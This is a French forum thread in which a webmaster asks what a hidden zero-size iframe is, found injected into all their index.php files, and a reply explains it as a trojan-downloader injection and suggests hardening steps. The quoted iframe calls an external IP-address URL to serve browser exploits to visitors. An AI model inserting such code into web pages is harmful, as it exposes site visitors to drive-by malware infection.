Discussion :

[Husqvarna]

Bonjour,

Mes sites web ont été hacké. Je me suis retrouvé avec le bout de code ci dessous à la fin de tous mes index.php.

Ma question question est : à quoi sert exactement cette iframe invisible?

Ma deuxième question est : y a t il des systèmes d'alerte qui peuvent me prévenir des qu'il y a des injections de code de cette manière?

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<iframe src="http://124.217.252.62/~admin/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

[Ksual]

Hébergement mutualisé, dédié ?

votre infection c'est le trojan downloader, ce n'est pas une attaque directe, mais bien une attaque automatique, et vous devriez revoir votre sécurité!

[Husqvarna]

Hébergement mutualisé, dédié ?

Mutualisé.

Mais il fait quoi ce bout de code?

Est ce qu'il y a des scans anti virus qui peuvent parcourir mes pages web?

[Ksual]

Ce n'est pas un virus hébergé sur le serveur, mais une faille de sécurité via la quelle on injecte un lien caché vers le script qui exploite les failles de navigateurs internet, etc.

C'est très courant sur des configurations mal protégées!

Vous pouvez commencer par mettre à jour votre CMS si une mise à jour est disponible, et d'empêcher les droits d'accès sur vos fichiers et dossiers(ftp>>>chmod).


Via le fichier .htaccess vous pouvez créer des règles de réécriture vous aidant à sécuriser votre configuration et avoir des url' seo friendly.
Enfin, il existe plein de tutoriels à ce sujet, CMSMS également dispose d'un wiki que vous pouvez consulter.


Pour supprimer l'injection de tous vos sites, j'ignore comment cela est possible d'une manière automatique via ce CMS, mais faite-le après avoir sécurisé votre configuration. En effet, ce sera plus facile si vous gérez tous vos sites via une seule interface d'administration.


Bon courage

[Husqvarna]

Hello,

Est ce qu'on peut pas avoir un anti virus dans son navigateur qui fait une alerte dès qu'il y a un tel "hack" sur un site?

Merci

[Ksual]

Les antivirus desktop de nos jours protègent les navigateurs aussi, donc si votre site est susceptible de contenir un virus il vous avertira lors de la visite.

Vous pouvez toutefois inscrire vos sites au centre webmaster de google, qui vous envoie un message si un de vos sites est suspect et présente une menace pour vos visiteurs, vous pouvez également vérifier manuellement via cette adresse;

N'hésitez pas à utiliser des extensions Firefox concernant la sécurité;


voilà en gros